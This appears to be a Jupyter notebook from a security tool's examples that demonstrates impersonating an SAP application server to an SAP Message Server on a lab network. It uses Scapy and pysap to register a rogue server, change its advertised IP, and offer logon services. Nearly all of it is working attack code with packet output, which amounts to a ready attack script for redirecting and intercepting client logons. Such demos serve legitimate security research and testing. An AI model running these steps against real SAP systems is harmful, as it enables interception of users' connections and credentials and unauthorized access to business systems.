SAP Message Server Application Server impersonation demo

Import the libraries, bind the protocol layer

In [1]:
from scapy.all import *
from pysap.SAPNI import *
from pysap.SAPMS import *
bind_layers(SAPNI, SAPMS, )
WARNING: No route found for IPv6 destination :: (no default route?)
WARNING:scapy.runtime:No route found for IPv6 destination :: (no default route?)

In this case, we will need to connect to the target server as first step:

In [3]:
# Initiate the connection
sock = socket.socket()
sock.connect(("192.168.56.102", 3900))
conn = SAPNIStreamSocket(sock)

We can tell the Message Server which version we're running:

In [4]:
prop = SAPMSProperty(id=7, release="720", patchno=70, supplvl=0, platform=0)
p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname="impersonator-demo", opcode=0x43, property=prop)
p.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = 'MSG_SERVER'
  msgtype   = 
  reserved  = ''
  key       = ''
  flag      = MS_ONE_WAY
  iflag     = MS_SEND_NAME
  fromname  = 'impersonator-demo'
  padd      = 0
  opcode    = MS_SET_PROPERTY
  opcode_error= MSOP_OK
  opcode_version= 1
  opcode_charset= 3
  \property  \
   |###[ SAP Message Server Property ]###
   |  client    = None
   |  id        = Release information
   |  release   = '720'
   |  patchno   = 70
   |  supplvl   = 0
   |  platform  = 0

In [5]:
conn.send(p)
Out[5]:
184

And then perform a login enabling the services we are suppose to support as application servers:

In [7]:
p = SAPMS(flag=0x08, iflag=0x08, msgtype=0x89, toname="-", fromname="impersonator-demo")
p.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = '-'
  msgtype   = DIA+BTC+ICM
  reserved  = ''
  key       = ''
  flag      = 8
  iflag     = MS_LOGIN_2
  fromname  = 'impersonator-demo'
  padd      = 0

In [8]:
response = conn.sr(p)[SAPMS]
response.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = 'impersonator-demo                       '
  msgtype   = DIA+BTC+ICM
  reserved  = ''
  key       = ''
  flag      = 8
  iflag     = MS_LOGIN_2
  fromname  = 'MSG_SERVER                              '
  padd      = 0

We tell the Message Server we are starting:

In [10]:
p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x05, toname="-", fromname="impersonator-demo")
p.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = '-'
  msgtype   = DIA+ENQ
  reserved  = ''
  key       = ''
  flag      = MS_ONE_WAY
  iflag     = MS_MOD_STATE
  fromname  = 'impersonator-demo'
  padd      = 0

In [11]:
conn.send(p)
Out[11]:
114

Next we will tell the Message Server our IP address:

In [13]:
p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname="impersonator-demo", opcode=0x06, opcode_version=0x02,
          change_ip_addressv4="192.168.56.1")
p.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = 'MSG_SERVER'
  msgtype   = 
  reserved  = ''
  key       = ''
  flag      = MS_ONE_WAY
  iflag     = MS_SEND_NAME
  fromname  = 'impersonator-demo'
  padd      = 0
  opcode    = MS_CHANGE_IP
  opcode_error= MSOP_OK
  opcode_version= 2
  opcode_charset= 3
  change_ip_addressv4= 192.168.56.1
  change_ip_addressv6= ::

In [14]:
response = conn.sr(p)[SAPMS]
response.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = 'impersonator-demo                       '
  msgtype   = 
  reserved  = ''
  key       = '\x00\x02\x00\x03\x00\x00\x02\x9f'
  flag      = MS_REQUEST
  iflag     = 0
  fromname  = 'demo_NSP_00                             '
  padd      = 0
  opcode    = 0
  opcode_error= MSOP_OK
  opcode_version= 0
  opcode_charset= 0
  opcode_value= '\x0b\x01\x02\x80!\x01\x00\xff\xff\xff\xff\xff\xff\xff\x02\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x00\x00\x00\x08\xff\xff\xff\xff\xff\xff                                                                                      `\xab[\x05\x00impersonator-demo                       \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x007\x00\x00\x00AD-EYECATCH\x00\x01\x01        104          2<\x00\x00\x00000SAPSYS                          RSMONGWY_SEND_NILIST                    \x00\xe2\x8f\xb0\x00\x00\x00M\x08\x03\x00\x00\x00\xe8\xbd\x8c\xca\xaf\xef\x86\xa8.\x00\x00\x00G\x00\x00\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00'

Set which logon services we provide:

In [15]:
l = SAPMSLogon(type=2, port=3200, address="192.168.56.1", host="impersonator-demo", misc="LB=3")
p = SAPMS(flag=0x01, iflag=0x01, msgtype=0x01, toname="MSG_SERVER", fromname="impersonator-demo", opcode=0x2b, logon=l)
p.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = 'MSG_SERVER'
  msgtype   = DIA
  reserved  = ''
  key       = ''
  flag      = MS_ONE_WAY
  iflag     = MS_SEND_NAME
  fromname  = 'impersonator-demo'
  padd      = 0
  opcode    = MS_SET_LOGON
  opcode_error= MSOP_OK
  opcode_version= 1
  opcode_charset= 3
  \logon     \
   |###[ SAP Message Server Logon ]###
   |  type      = MS_LOGON_DIAG
   |  port      = 3200
   |  address   = 192.168.56.1
   |  logonname_length= None
   |  logonname = ''
   |  prot_length= None
   |  prot      = ''
   |  host_length= None
   |  host      = 'impersonator'
   |  misc_length= None
   |  misc      = 'LB=3'
   |  address6_length= 16
   |  address6  = ::

In [16]:
response = conn.sr(p)[SAPMS]
response.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = '-\x00:0.\x00%s: LOGIN data len (%d %d)\x00\x00DpRGet'
  msgtype   = 
  reserved  = ''
  key       = ''
  flag      = MS_ONE_WAY
  iflag     = 0
  fromname  = 'demo_NSP_00                             '
  padd      = 0
  opcode    = MS_SERVER_CHG
  opcode_error= MSOP_OK
  opcode_version= 0
  opcode_charset= 0
###[ Raw ]###
     load      = '\x0b\x01\x02\x80!\x00\x00\xff\xff\xff\xff\xff\xff\xff\x06\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff                                                                                      \x00\x12\xf7\x08\x01-                                       \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00AD-EYECATCH\x00\x01\x01        104          2<\x00\x00\x00000SAPSYS                          RSPOWP00                                \x00\x00\x00\xef\xbf\xbf\xef\xbf\xbf\x00\x00\x00\x00\x00\x00\xef\xbf\xbf\xef\xbf\xbf\xe4\xa0\xa0 ,\x00\x00\x00\x00S\x00R\x00V\x00 \x00 \x00I\x00d\x00e\x00m\x00o\x00_\x00N\x00S\x00P\x00_\x000\x000\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00'

We set the IP Address property:

In [17]:
prop = SAPMSProperty(client="impersonator-demo", id=0x03, address="192.168.56.1")
p = SAPMS(flag=0x02, iflag=0x01, toname="-", fromname="impersonator-demo",
          opcode=0x43, property=prop)
p.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = '-'
  msgtype   = 
  reserved  = ''
  key       = ''
  flag      = MS_REQUEST
  iflag     = MS_SEND_NAME
  fromname  = 'impersonator-demo'
  padd      = 0
  opcode    = MS_SET_PROPERTY
  opcode_error= MSOP_OK
  opcode_version= 1
  opcode_charset= 3
  \property  \
   |###[ SAP Message Server Property ]###
   |  client    = 'impersonator-demo'
   |  id        = MS_PROPERTY_IPADR
   |  address   = 192.168.56.1
   |  address6  = ::

In [18]:
response = conn.sr(p)[SAPMS]
response.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = 247
  toname    = 'impersonator-demo                       '
  msgtype   = 
  reserved  = ''
  key       = ''
  flag      = MS_REQUEST
  iflag     = MS_SEND_NAME
  fromname  = '-\x00 \x00rsonator-demo'
  padd      = 0
  opcode    = 0
  opcode_error= MSOP_OK
  opcode_version= 1
  opcode_charset= 3
  opcode_value= ''

And finally change our status to active:

In [19]:
p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x01, toname="-", fromname="impersonator-demo")
conn.send(p)
Out[19]:
114

We can now start listening to packets from another application servers or clients:

In [20]:
response = conn.recv()[SAPMS]
response.show()
###[ SAP Message Server ]###
  eyecatcher= '**MESSAGE**'
  version   = 4
  errorno   = MSERECONNECTION
  toname    = '-\x00:0.\x00%s: LOGIN data len (%d %d)\x00\x00DpRGet'
  msgtype   = 
  reserved  = ''
  key       = ''
  flag      = MS_ONE_WAY
  iflag     = 0
  fromname  = 'demo_NSP_00                             '
  padd      = 0
  opcode    = MS_SERVER_CHG
  opcode_error= MSOP_OK
  opcode_version= 0
  opcode_charset= 0
###[ Raw ]###
     load      = '\x0b\x01\x02\x80!\x00\x00\xff\xff\xff\xff\xff\xff\xff\x06\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfc\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff                                                                                      \x80\x01\x00"\x01-                                       \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00AD-EYECATCH\x00\x01\x01        104          2<\x00\x00\x00000SAPSYS                          RSPOWP00                                \x00\x00\x00\xef\xbf\xbf\xef\xbf\xbf\x00\x00\x00\x00\x00\x00\xef\xbf\xbf\xef\xbf\xbf\xe4\xa0\xa0 ,\x00\x00\x00\x00S\x00R\x00V\x00 \x00 \x00I\x00d\x00e\x00m\x00o\x00_\x00N\x00S\x00P\x00_\x000\x000\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00'

In []:
response = conn.recv()[SAPMS]
response.show()
In []:
response = conn.recv()[SAPMS]
response.show()
In []:
response = conn.recv()[SAPMS]
response.show()